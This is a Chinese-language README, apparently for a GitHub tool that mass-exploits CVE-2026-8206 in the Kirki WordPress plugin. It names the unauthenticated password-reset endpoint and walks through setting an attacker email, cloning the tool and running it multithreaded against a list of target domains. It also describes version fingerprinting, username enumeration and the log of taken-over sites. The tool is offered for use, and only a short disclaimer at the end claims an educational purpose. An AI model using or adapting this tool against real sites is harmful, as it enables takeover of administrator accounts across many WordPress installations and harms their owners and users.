CVE-2026-8206 批量利用工具 – 针对 Kirki WordPress 插件(版本 ≤ 6.0.6)中的一个严重漏洞,允许未经身份验证的攻击者劫持密码重置链接并接管任何用户帐户,包括管理员。
Kirki 插件暴露了一个未经身份验证的 REST 端点(/wp-json/KirkiComponentLibrary/v1/kirki-forgot-password)。由于缺少权限检查和不正确的电子邮件验证,攻击者可以:
受影响版本: ≤ 6.0.6
已修复版本: 6.0.7
readme.txt 和 kirki.min.css(同时支持 kirki 和 kirki-test 文件夹)/wp-json/wp/v2/users 获取真实用户名(回退为 admin)requests 库concurrent.futures(反向移植,通常已安装)安装依赖:
pip install requests futures
git clone https://github.com/Jenderal92/CVE-2026-8206.git
cd CVE-2026-8206
编辑脚本,设置你的攻击者邮箱:
ATTACKER_EMAIL = "[email protected]" # 第 ~15 行
python CVE-2026-8206.py <targets_file> [threads]
<targets_file> – 文本文件,每行一个域名(可带或不带 http:///https://)[threads] – 可选,并发线程数(默认:15)python CVE-2026-8206.py targets.txt 20
targets.txt)example.com
https://vulnerable-site.com
http://127.0.0.1/wordpress
res.txt – 包含成功利用的目标,格式如下:
URL|username|attacker_email|reset_link_sent_to_attacker_email
示例:
https://example.com|admin|[email protected]|reset_link_sent_to_attacker_email
控制台输出显示实时进度:
/wp-content/plugins/{kirki,kirki-test}/readme.txt(Stable tag)和 /.../kirki.min.css(ver 参数)。如果版本 ≤ 6.0.6,则继续。/wp-json/wp/v2/users,如果为空则回退为 admin。username = 目标用户名email = 攻击者的电子邮件emailBody = JSON 格式,包含 reset_link 芯片200 和 "Email sent",则将目标写入 res.txt。本软件仅供教育和授权安全测试目的使用。未经授权用于你不拥有或未获许可测试的系统是违法的。作者不对该工具的任何误用或造成的损害负责。
更多免责声明可在 Jenderal92 封面页查看。你可以点击 此处 查看。